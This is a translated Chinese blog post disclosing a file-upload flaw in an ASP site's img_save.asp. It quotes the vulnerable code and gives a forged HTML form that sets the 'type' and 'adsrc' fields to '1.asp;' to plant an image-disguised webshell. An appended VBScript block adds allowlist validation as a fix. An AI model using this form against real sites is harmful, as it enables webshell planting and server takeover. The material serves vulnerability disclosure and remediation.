Source: 自学PHP网  Date: 2015-04-17 13:03
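Out of necessity I downloaded the source code and looked through it. The problem is in the file \inc\img_save.asp:
....(ten million lines omitted)....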
set fs=server.CreateObject("scripting.filesystemobject")
set upload=new upload_5xSoft ''create the upload object
'--------convert the date into a file name--------
formPath="/uploadfile/"
formpath2=upload.form("type") ' BUG is here: the type value is taken from the form, so the path is user-defined
formPath=formPath&formPath2 ' the path is built here: uploadfile + type
if upload.form("adsrc")="" then
    adsrc="ADSrc"
else
    adsrc=upload.form("adsrc")
end if
''append (/) to the directory
if right(formPath,1)<>"/" then formPath=formPath&"/"
set file=upload.file("picture") ''create a file object
if file.FileSize>0 then ''FileSize > 0 means there is file data
    if file.filesize>300000 then
        response.write"<SCRIPT language=JavaScript>alert('上传图片大于规定(300K),请改变文件大小后重新上传!');"
        response.write"javascript:history.back(-1)</SCRIPT>"
        response.end
    end if
    FileExt = Mid(file.Filename, InStrRev(file.Filename, ".")+1)
    FileExt = FixName(FileExt)
    If Not ( CheckFileExt(FileExt) ) Then
        response.write"<SCRIPT language=JavaScript>alert('上传图片只支持gif|jpg|jpeg|bmp|png 图象文件!');"
        response.write"javascript:history.back(-1)</SCRIPT>"
        response.end
    end if
    thename=MakedownName()&"."&FileExt
    'check whether the member image directory exists
    Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
    If objFSO.FolderExists(Server.MapPath(""&formPath&"")) Then 'if it exists, save the image directly
        file.SaveAs Server.mappath(formPath&thename)
    Else
        objFSO.CreateFolder(Server.MapPath(""&formPath&"")) 'if it does not exist, create the directory
        file.SaveAs Server.mappath(formPath&thename)
        Set Jpeg = Server.CreateObject("Persits.Jpeg") 'instantiate the component
        Path = Server.MapPath(formPath&thename) 'path of the image to process
        Jpeg.Open Path
        If Jpeg.OriginalWidth / Jpeg.OriginalHeight > 1 then
            Jpeg.Width = 350
            Jpeg.Height = int((350/Jpeg.OriginalWidth)*Jpeg.OriginalHeight)
        elseif Jpeg.OriginalWidth / Jpeg.OriginalHeight < 1 then
            Jpeg.Height = 350
            Jpeg.Width= int(Jpeg.OriginalWidth*(350/Jpeg.Height))
        end if
        Jpeg.Save Server.MapPath(formPath&thename)
    End If
    Set objFSO = Nothing 'release the FileSystemObject instance
    imgs=thename
else
    response.write"<SCRIPT language=JavaScript>alert('上传文件为空或文件太大!');"
    response.write"javascript:history.back(-1)</SCRIPT>"
    response.end
end if
%>
<script>
//alert("上传图片成功")
var random = Math.random();
window.opener.document.Form1.<%=adsrc%>.value="<%=formpath%><%=imgs%>"; //* returns the path plus the file name
....(ten million lines omitted)....
Next, forge a form to submit an image-disguised webshell:
<FORM name=formuppic action=http://www.2cto.com /inc/img_save.asp method=post encType=multipart/form-data>
<input type="hidden" name="adsrc" value="1.asp;"><input type="hidden" name="type" value="1.asp;">
<TBODY>
<TR>
<TD>上传文件:
<input type=file name="picture"> <INPUT style="FONT-SIZE: 9pt" type=submit value="确 定" name=submit>
</TD>
</TR>
</TBODY> </FORM>
After uploading, you get the address: window.opener.document.Form1.1.asp;.value="/uploadfile/1.asp;/2011111990914.jpg";
Fix: see earlier articles on this site.
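The root cause annotated in img_save.asp is that `type` and `adsrc` travel from the form into the save path and the returned script without any check. One way to constrain both, as an added example that is not part of the original post or the affected product's code; `IsSafeToken`, `ResolveUploadDir`, `ResolveFieldName` and the folder names in `ALLOWED_TYPES` are hypothetical:

```vbscript
' Added example: allowlist validation for the two client-supplied fields
' that img_save.asp uses unchecked. All helper names are hypothetical.

Const ALLOWED_TYPES = "product,news,member"   ' constructed sample folder names

' True only for 1-32 characters of letters, digits, underscore or hyphen.
' Rejects ".", ";", "/", "\" and ":" so the value cannot alter the path
' or add script syntax where it is echoed back to the browser.
Function IsSafeToken(s)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[A-Za-z0-9_-]{1,32}$"
    IsSafeToken = re.Test(s)
    Set re = Nothing
End Function

' Map the requested type onto a fixed list of folders; anything else
' (including an empty value) falls back to the base upload folder.
Function ResolveUploadDir(rawType)
    Dim base, item
    base = "/uploadfile/"
    ResolveUploadDir = base
    If Not IsSafeToken(rawType) Then Exit Function
    For Each item In Split(ALLOWED_TYPES, ",")
        If StrComp(item, rawType, vbTextCompare) = 0 Then
            ResolveUploadDir = base & item & "/"   ' server-side spelling, not the client's
            Exit Function
        End If
    Next
End Function

' Field name written into window.opener.document.Form1.<name>.value
Function ResolveFieldName(rawName)
    If IsSafeToken(rawName) Then
        ResolveFieldName = rawName
    Else
        ResolveFieldName = "ADSrc"   ' same default the original script uses
    End If
End Function

' These two assignments stand in for the unchecked ones in img_save.asp and
' assume its existing upload object (upload_5xSoft) is already created.
formPath = ResolveUploadDir(upload.form("type"))
adsrc = ResolveFieldName(upload.form("adsrc"))
```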
Excerpted from 萝卜头's Blog